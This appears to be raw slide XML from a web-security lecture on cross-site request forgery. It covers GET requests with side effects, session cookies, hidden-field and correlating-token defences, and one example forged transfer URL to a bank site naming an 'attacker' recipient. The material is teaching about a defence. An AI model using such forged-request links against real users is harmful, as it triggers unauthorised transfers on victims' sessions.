              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="-30" dirty="0"/>
              <a:t>(Same </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>as with </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="50" dirty="0"/>
              <a:t>hidden </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="30" dirty="0"/>
              <a:t>field</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-60" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="15" dirty="0"/>
              <a:t>identifiers)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F0FAAA8-FF72-5347-BDBC-2B9D55ACE980}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="4883150"/>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F0E52633-379F-3747-BFEC-C5CE875C1584}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="4819650"/>
            <a:ext cx="8105775" cy="415925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Can also </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>require </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>separate, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>correlating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" spc="-20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>information</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00526066-E6E8-4C47-86DB-0E06BC454065}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="5441950"/>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12" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29519855-7259-4249-BEC0-192EA8C86A80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="6411913"/>
            <a:ext cx="157162" cy="319087"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="315" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70669" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79AD4806-2FEB-3D4E-8B4B-F18473A86BA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="5378450"/>
            <a:ext cx="7794625"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700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Only accept requests due to legitimate  interactions with site (e.g., from clicking links)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Defenses for CSRF, discussed shortly, can do this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A13509-20DB-5547-B57A-F53837788D32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="0"/>
            <a:ext cx="9906000" cy="70104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71683" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FAC37A0-92EE-C54B-9EB3-3982D0B3139C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="2438400"/>
            <a:ext cx="78105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584200" indent="-5715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6000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cross-Site Request  Forgery (CSRF)</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EFE151A-2C67-E34A-9782-576436C5010E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="957263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="358145" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6100" spc="-65" dirty="0"/>
              <a:t>URLs </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="15" dirty="0"/>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="100" dirty="0"/>
              <a:t>side</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="45" dirty="0"/>
              <a:t>effects</a:t>
            </a:r>
            <a:endParaRPr sz="6100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12266FD1-DE95-9742-9361-3203AFFD8B3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474663" y="2847975"/>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66A07004-6968-674E-92A3-F4EE565693EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="2787650"/>
            <a:ext cx="8588375" cy="415925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>requests </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>often have </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>side effects on server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" spc="20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>state</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6BF4283-4782-E947-8390-C9C9E03D4A33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819150" y="3417888"/>
            <a:ext cx="157163"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dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C117EE4-1FD6-3E4A-90E5-63A617BA2D84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1168400" y="3359150"/>
            <a:ext cx="6053138" cy="4159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Even </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>though </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>they </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>not </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>supposed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:endParaRPr sz="2700" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C80E454-3CA9-FE42-B963-3CCEFF502FF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474663" y="4251325"/>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67C47A02-1E73-4542-931C-A9CBF7DA67B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="4197350"/>
            <a:ext cx="2600325" cy="4159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What </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>happens</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-35" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9FBEEA7-C4F8-414F-B46B-628220E884D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819150" y="4821238"/>
            <a:ext cx="157163"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0" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0609E355-335C-8241-B30A-0616F17E2910}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819150" y="5391150"/>
            <a:ext cx="157163"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72715" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E16446A-FE22-DC44-BC9E-2021F208EA78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1168400" y="4616450"/>
            <a:ext cx="812323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6000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user is logged in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>with an active session cookie  a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request is issued for the above link?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2700">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{578B180D-B6E6-4E49-B218-C392CC7BE3A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474663" y="6226175"/>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3" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6685F4B-E820-5549-9A20-66219E63EEFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="6165850"/>
            <a:ext cx="6275388" cy="4159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How </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>could </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>you </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>get </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a user </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to visit </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-155" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>link?</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{464A3CFF-559E-E646-9770-5CC67A695272}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1382713" y="1873250"/>
            <a:ext cx="7292975" cy="312738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFF200"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="17747" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="37399" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900" spc="20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://bank.com/transfer.cgi?amt=9999&amp;to=attacker</a:t>
            </a:r>
            <a:endParaRPr sz="190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536DA05-C24B-334E-9E3D-6E07B42C4365}"/>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3731" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8263B12B-BBFC-744B-A000-BB449F9DEB8D}"/>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3732" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{137FDC9F-530B-1748-954C-F37982221DCF}"/>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3733" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0AF8AA0-7BAD-D049-8BBC-53E8BC2DEAA5}"/>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0BEE7158-8767-9940-8CA3-B7DA0844E72D}"/>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D1B5611B-DE3E-5A45-B015-77C9E36B231E}"/>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3736" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56F0A9AC-908B-D649-9A59-1EDEE9D306C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="5908675"/>
            <a:ext cx="2132013" cy="16954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3737" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF05D0B6-47CA-5E40-B648-957A62A3A161}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="931863" y="5943600"/>
            <a:ext cx="2051050" cy="16097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3738" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5E00BF8-5356-504C-BC64-A7F6400D828B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="931863" y="59436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3739" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF7CB069-5DE3-F34D-82F2-2824E7844259}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1111250" y="64912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C2062E6F-6174-9940-BE26-EFA33AA0F58C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="73731" idx="2"/>
            <a:endCxn id="73736" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1979613" y="4533900"/>
            <a:ext cx="42862" cy="13747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3741" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80E8692E-9E2C-6E4B-A0E7-CC5C70C39621}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2139950" y="5030788"/>
            <a:ext cx="1716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a:t>connected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7CFBCCE-C8C4-864D-A69B-0491D51C6ACF}"/>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4755" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03D3F78B-BFB1-2D41-8429-986B319BB2C8}"/>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4756" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98DE0A3A-842F-E740-A5EF-FFFA56D370CC}"/>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4757" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{740B537D-B7E1-5744-8BAD-376DA6F7436A}"/>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941EEB73-F3E4-8942-98AB-45A13A38F077}"/>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26BEABC0-CC62-0A4A-B52D-6602B467452F}"/>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4760" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{159BC3DF-B18A-D948-A929-355E5CA711CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
